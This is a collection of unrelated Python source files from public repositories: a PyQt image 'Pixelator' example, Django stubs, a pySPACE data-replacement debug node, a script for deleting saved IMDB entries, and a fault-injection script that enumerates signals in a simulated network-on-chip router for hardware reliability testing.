helpMenu = QtGui.QMenu("&Help", self)
aboutAction = helpMenu.addAction("&About")
self.menuBar().addMenu(fileMenu)
self.menuBar().addSeparator()
self.menuBar().addMenu(helpMenu)
openAction.triggered.connect(self.chooseImage)
self.printAction.triggered.connect(self.printImage)
quitAction.triggered.connect(QtGui.qApp.quit)
aboutAction.triggered.connect(self.showAboutBox)
pixelSizeSpinBox.valueChanged.connect(delegate.setPixelSize)
pixelSizeSpinBox.valueChanged.connect(self.updateView)
controlsLayout = QtGui.QHBoxLayout()
controlsLayout.addWidget(pixelSizeLabel)
controlsLayout.addWidget(pixelSizeSpinBox)
controlsLayout.addStretch(1)
mainLayout = QtGui.QVBoxLayout()
mainLayout.addWidget(self.view)
mainLayout.addLayout(controlsLayout)
centralWidget.setLayout(mainLayout)
self.setCentralWidget(centralWidget)
self.setWindowTitle("Pixelator")
self.resize(640, 480)
def chooseImage(self):
fileName = QtGui.QFileDialog.getOpenFileName(self, "Choose an Image",
self.currentPath, '*')
if fileName:
self.openImage(fileName)
def openImage(self, fileName):
image = QtGui.QImage()
if image.load(fileName):
self.model.setImage(image)
if not fileName.startswith(':/'):
self.currentPath = fileName
self.setWindowTitle("%s - Pixelator" % self.currentPath)
self.printAction.setEnabled(True)
self.updateView()
def printImage(self):
if self.model.rowCount(QtCore.QModelIndex()) * self.model.columnCount(QtCore.QModelIndex()) > 90000:
answer = QtGui.QMessageBox.question(self, "Large Image Size",
"The printed image may be very large. Are you sure that "
"you want to print it?",
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
if answer == QtGui.QMessageBox.No:
return
printer = QtGui.QPrinter(QtGui.QPrinter.HighResolution)
dlg = QtGui.QPrintDialog(printer, self)
dlg.setWindowTitle("Print Image")
if dlg.exec_() != QtGui.QDialog.Accepted:
return
painter = QtGui.QPainter()
painter.begin(printer)
rows = self.model.rowCount(QtCore.QModelIndex())
columns = self.model.columnCount(QtCore.QModelIndex())
sourceWidth = (columns+1) * ItemSize
sourceHeight = (rows+1) * ItemSize
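        # Centre the uniformly scaled grid on the printed page: translate to the page
        # centre, apply the scale, then shift back by half of the source dimensions.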
painter.save()
xscale = printer.pageRect().width() / float(sourceWidth)
yscale = printer.pageRect().height() / float(sourceHeight)
scale = min(xscale, yscale)
painter.translate(printer.pageRect().x()+printer.pageRect().width()/2,
printer.pageRect().y()+printer.pageRect().height()/2)
painter.scale(scale, scale)
        painter.translate(-sourceWidth/2, -sourceHeight/2)
option = QtGui.QStyleOptionViewItem()
parent = QtCore.QModelIndex()
progress = QtGui.QProgressDialog("Printing...", "Cancel", 0, rows,
self)
y = ItemSize / 2.0
for row in range(rows):
progress.setValue(row)
QtGui.qApp.processEvents()
if progress.wasCanceled():
break
x = ItemSize / 2.0
for col in range(columns):
option.rect = QtCore.QRect(x, y, ItemSize, ItemSize)
                self.view.itemDelegate().paint(painter, option,
                        self.model.index(row, col, parent))
x = x + ItemSize
y = y + ItemSize
progress.setValue(rows)
painter.restore()
painter.end()
if progress.wasCanceled():
QtGui.QMessageBox.information(self, "Printing canceled",
"The printing process was canceled.",
QtGui.QMessageBox.Cancel)
def showAboutBox(self):
QtGui.QMessageBox.about(self, "About the Pixelator example",
"This example demonstrates how a standard view and a custom\n"
"delegate can be used to produce a specialized "
"representation\nof data in a simple custom model.")
def updateView(self):
self.view.resizeColumnsToContents()
self.view.resizeRowsToContents()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
window = MainWindow()
window.show()
window.openImage(':/images/qt.png')
sys.exit(app.exec_())
|
drawquest/drawquest-web | refs/heads/master | website/apps/canvas_auth/migrations/0001_initial.py | 2 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
pass
def backwards(self, orm):
pass
models = {
}
complete_apps = ['canvas_auth']
|
bodedev/prospera | refs/heads/master | plataforma/tests.py | 873 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase
# Create your tests here.
|
eudoxos/woodem | refs/heads/master | py/apiversion.py | 3 | # encoding: utf-8
import woo.core
###
### Set API version here. Usually something like
###
### major × 10000 + minor × 100 + API revision
###
### document changes in doc/api.rst
###
### make sure the number is never decreased
###
woo.core.Master.instance.api=10102
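### e.g. 10102 = 1*10000 + 1*100 + 2, i.e. major 1, minor 1, API revision 2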
###
###
###
|
pyspace/test | refs/heads/master | pySPACE/missions/nodes/debug/exchange_data.py | 1 | """Exchange the data against some self created data
"""
import numpy
from pySPACE.missions.nodes.base_node import BaseNode
from pySPACE.resources.data_types.time_series import TimeSeries
from pySPACE.tests.utils.data.test_data_generation import *
class ExchangeDataNode(BaseNode):
"""Exchange the data against some self created data
This can be used for testing/debugging purposes,
if the markers etc should be retained,
but the data should be replaced by data with known properties.
**Parameters**
:generator_expression:
Specify generator expression. Uses the data generators in :mod:`~pySPACE.tests.utils.data.test_data_generation`.
(*optional, default: "Adder([One(),Multiplier([Constant(200),Channel(data.shape[1],data.shape[0])]),TimePoint(data.shape[1],data.shape[0])])"*)
**Exemplary Call**
.. code-block:: yaml
-
node : Exchange_Data
parameters :
generator_expression : "One()"
:Authors: Hendrik Woehrle ([email protected])
:Created: 2012/04/20
"""
def __init__(self,
generator_expression = "Adder([One(),Multiplier([Constant(200),Channel(data.shape[1],data.shape[0])]),TimePoint(data.shape[1],data.shape[0])])",
**kwargs):
        super(ExchangeDataNode, self).__init__(**kwargs)
self.set_permanent_attributes(ts_generator = TestTimeSeriesGenerator(),
generator = None,
generator_expression = generator_expression)
def _execute(self, data):
"""
Exchanges the data with some manually generated data.
"""
if self.generator is None:
self.generator = eval(self.generator_expression)
self.data_item = \
self.ts_generator.generate_test_data(
channels=data.shape[1],
time_points=data.shape[0],
function=self.generator,
sampling_frequency=data.sampling_frequency,
channel_order=True,
channel_names=data.channel_names,
dtype=numpy.float)
result_time_series = TimeSeries.replace_data(data, self.data_item)
return result_time_series
_NODE_MAPPING = {"Exchange_Data": ExchangeDataNode}
|
at1as/IMDB-Scrape | refs/heads/master | scripts/remove_entry.py | 2 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# Remove saved entries from saved json repositories
# Useful for entries that have been tagged incorrectly
from __future__ import unicode_literals
import os
import re
import sys
import json
from unicodedata import normalize
def relative_path(file_path):
# Get path relative to this file
current_dir = os.path.dirname(__file__)
return os.path.join(current_dir, file_path)
# Import Environment Configuration
try:
with open(relative_path('../conf.json')) as config_json:
config = json.load(config_json)
except Exception as ex:
print "\nInvalid JSON body in conf.json\nSee: http://jsonformatter.curiousconcept.com/ for assistance {}\n".format(ex)
raise SystemExit
DATA = [
config['assets']['movies']['saved_data'],
config['assets']['series']['saved_data']
]
HELP = """\nUsage:
python remove_entry.py [type] "<filename>" [year]
\n[type] :
-m, --movie \t\t=> movie
-s, --series \t\t=> series
\n[year] :
- four digit year
- The [year] field is optional. If not passed, first matching title will be deleted
\nExamples:
python remove_entry.py -m "Monty Python and the Holy Grail"
python remove_entry.py --series "Six Feet Under" 2001
\nNote:
- Use single quotes around title if it contains special characters (such as '!')
- The [year] field is optional. If not passed, first matching title will be deleted\n"""
def sanitize(string):
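    # Normalize a title for comparison: lowercase, drop ':' and '-', trim, and collapse
    # repeated whitespace, e.g. "The Dark  Knight: Rises" -> "the dark knight rises".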
return re.sub("\s{2,}", " ", string.lower().replace(':', '').replace('-', '').strip())
def remove_file(filetype, asset_name, year):
if filetype in ['-m', '--movie']:
filename = DATA[0]
elif filetype in ['-s', '--series']:
filename = DATA[1]
else:
print HELP
return
if os.path.isfile(relative_path('../' + filename)):
found = False
with open(relative_path('../' + filename), 'r') as saved_asset_list:
saved_assets = json.load(saved_asset_list)
# Delete entry
try:
for key in saved_assets:
if sanitize(saved_assets[key]['title']) == sanitize(asset_name):
# Find entry matching year if arg is passed, else delete first matching title found
if year is None or (saved_assets[key]['year'] == year):
del saved_assets[key]
found = True
break
if not found:
year_arg = year or "any year"
print "\nEntry not found: \"%s\" for %s in \"%s\"\n" % (asset_name, year or "any year", filename)
return
except KeyError:
print "\nEntry not found: \"%s\" in \"%s\"\n" % (asset_name, filename)
return
# Write contents to JSON file
with open(relative_path('../' + filename), 'w+') as asset_feed:
json.dump(saved_assets, asset_feed, encoding="utf-8", indent=4)
print "\nEntry deleted: \"%s\" from \"%s\"\n" % (asset_name, filename)
return
else:
print "\nFile not found: \"%s\"\n" % filename
return
if __name__ == "__main__":
try:
if sys.argv[1] in ["-h", "--help", "--h", " "]:
print HELP
else:
if len(sys.argv) == 4:
remove_file(sys.argv[1], normalize("NFC", sys.argv[2].decode('UTF-8')), sys.argv[3])
else:
                # No year arg was passed; the first matching title will be deleted
remove_file(sys.argv[1], normalize("NFC", sys.argv[2].decode('UTF-8')), None)
except IndexError:
print HELP
|
siavooshpayandehazad/NoC_Router | refs/heads/master | Scripts/include/fault_injector_do.py | 3 | import random
import sys
import numpy
from Scripts.include.package import *
#----------------------------------------------------------------------------------------------
#
# Fault Class
#
#----------------------------------------------------------------------------------------------
class fault:
location = None
bitwidth = None
Type = None
mean_time = None
std_dev = None
shut_down_time = None
def __init__(self, loc, width, fault_type, mean_time, std_dev, shut_down_time):
if width > 1:
random_position = random.randint(0, width-1)
self.location = loc+"("+str(random_position)+")"
else:
self.location = loc
self.bitwidth = width
self.Type = fault_type
self.mean_time = mean_time
self.std_dev = std_dev
self.shut_down_time = shut_down_time
def report(self):
"""
The fault reports its location, signal width, type, MTBF, STD_Dev and shutdown time!
"""
print "Location: ", self.location, "\twidth: ", self.bitwidth, "\tfault_type: ", '%5s' %self.Type,\
"\tMTBF: ", self.mean_time, "\tstd deviation: ", self.std_dev , "\tshutdown time", \
self.shut_down_time
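# Illustrative usage (hypothetical, not part of the original script): each fault object
# wraps one injection target plus its timing parameters, e.g.
#
#     example_fault = fault("tb_network_2x2:NoC:R_0:RX_L", 32, "transient", 1000, 101, 2000)
#     example_fault.report()
#
# The signal path and numbers above are made-up placeholders; fault_type is stored as-is,
# so any descriptive string may be used.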
#----------------------------------------------------------------------------------------------
#
# Other functions
#
#----------------------------------------------------------------------------------------------
def report_faults(fault_list):
"""
Reports all the faults in the fault list
"""
print "---------------------------------------"
print "fault injection points:"
for fault in fault_list:
fault.report()
print "---------------------------------------"
#----------------------------------------------------------------------------------------------
# Generating signals for different modules
# for this purpose we only consider fault injection points marked with X:
#
# .-------------.
# .----> | Checkers | <---.
# | | Module | |
# | '-------------' |
# | ^ |
# | | |
# | X |
# | .-------------. |
# | | Module | |
# -----o----->| under |--X--o------->
# | check |
# '-------------'
#
#----------------------------------------------------------------------------------------------
def list_all_the_links(network_size):
"""
takes the network size and returns a list of all the RX signals in the network
"""
list_of_ports = []
list_of_widths = []
for i in range(0, network_size*network_size):
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":RX_L")
list_of_widths.append(32)
if i/network_size != 0:
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":RX_N")
list_of_widths.append(32)
if i/network_size != network_size-1:
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":RX_S")
list_of_widths.append(32)
if i%network_size != 0:
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":RX_W")
list_of_widths.append(32)
if i%network_size != network_size-1:
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":RX_E")
list_of_widths.append(32)
return list_of_ports, list_of_widths
def list_all_the_lbdr_signals(network_size):
"""
takes the network size and returns a list of all the relevant LBDR signals in the network
"""
list_of_ports = []
list_of_widths = []
# Every router has the Local port
for i in range(0, network_size*network_size):
# internal signals of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:N1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:E1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:W1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:S1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:Req_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:Req_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:Req_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:Req_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:Req_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:grants")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:packet_drop_in")
# output signal(s) of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:packet_drop_order")
list_of_widths += [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
# for i in range(0, network_size*2):
if i/network_size != 0: # has port N
# internal signals of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:N1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:E1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:W1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:S1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:Req_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:Req_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:Req_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:Req_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:Req_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:grants")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:packet_drop_in")
# output signal(s) of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:packet_drop_order")
list_of_widths += [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i/network_size != network_size-1: # has port S
# internal signals of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:N1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:E1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:W1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:S1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:Req_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:Req_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:Req_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:Req_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:Req_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:grants")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:packet_drop_in")
# output signal(s) of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:packet_drop_order")
list_of_widths += [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i%network_size != 0: # has port W
# internal signals of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:N1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:E1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:W1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:S1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:Req_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:Req_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:Req_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:Req_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:Req_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:grants")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:packet_drop_in")
# output signal(s) of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:packet_drop_order")
list_of_widths += [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i%network_size != network_size-1: # has port E
# internal signals of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:N1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:E1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:W1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:S1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:Req_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:Req_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:Req_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:Req_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:Req_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:grants")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:packet_drop_in")
# output signal(s) of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:packet_drop_order")
list_of_widths += [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
return list_of_ports, list_of_widths
def list_all_the_arbiter_signals(network_size):
"""
takes the network size and returns a list of all the relevant arbiter signals in the network
"""
list_of_ports = []
list_of_widths = []
# Every router has the Local port
for i in range(0, network_size*network_size):
# Output signals of Allocator related to output N
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:valid_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_N") # The _signal should have fault injected or the main one ? i.e. grant_N_N or grant_N_N_signal ?! Because checker is checking grant_N_N_sig.
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_L")
# Internal signals of Allocator related to output N
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_L_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_N_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_E_L") # Input E requesting Output L ?!
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_W_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_S_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_L_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_N_sig") # ??
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_E_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_W_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_S_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_L_sig")
list_of_widths += [1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
# for i in range(0, network_size*2):
if i/network_size != 0: # has port N
# Output signals of Allocator related to output N
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:valid_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_N") # The _signal should have fault injected or the main one ? i.e. grant_N_N or grant_N_N_signal ?! Because checker is checking grant_N_N_sig.
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_L")
# Internal signals of Allocator related to output N
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_N_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_N_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_E_N") # Input E requesting Output N ?!
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_W_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_S_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_L_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_N_sig") # ??
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_E_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_W_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_S_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_L_sig")
list_of_widths += [1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i/network_size != network_size-1: # has port S
# Output signals of Allocator related to output S
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:valid_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_N") # The _signal should have fault injected or the main one ? i.e. grant_N_N or grant_N_N_signal ?! Because checker is checking grant_N_N_sig.
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_L")
# # Internal signals of Allocator related to output S
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_S_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_N_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_E_S") # Input E requesting Output S ?!
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_W_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_S_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_L_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_N_sig") # ??
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_E_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_W_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_S_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_L_sig")
list_of_widths += [1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i%network_size != 0: # has port W
# Output signals of Allocator related to output W
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:valid_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_N") # The _signal should have fault injected or the main one ? i.e. grant_N_N or grant_N_N_signal ?! Because checker is checking grant_N_N_sig.
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_L")
# # Internal signals of Allocator related to output W
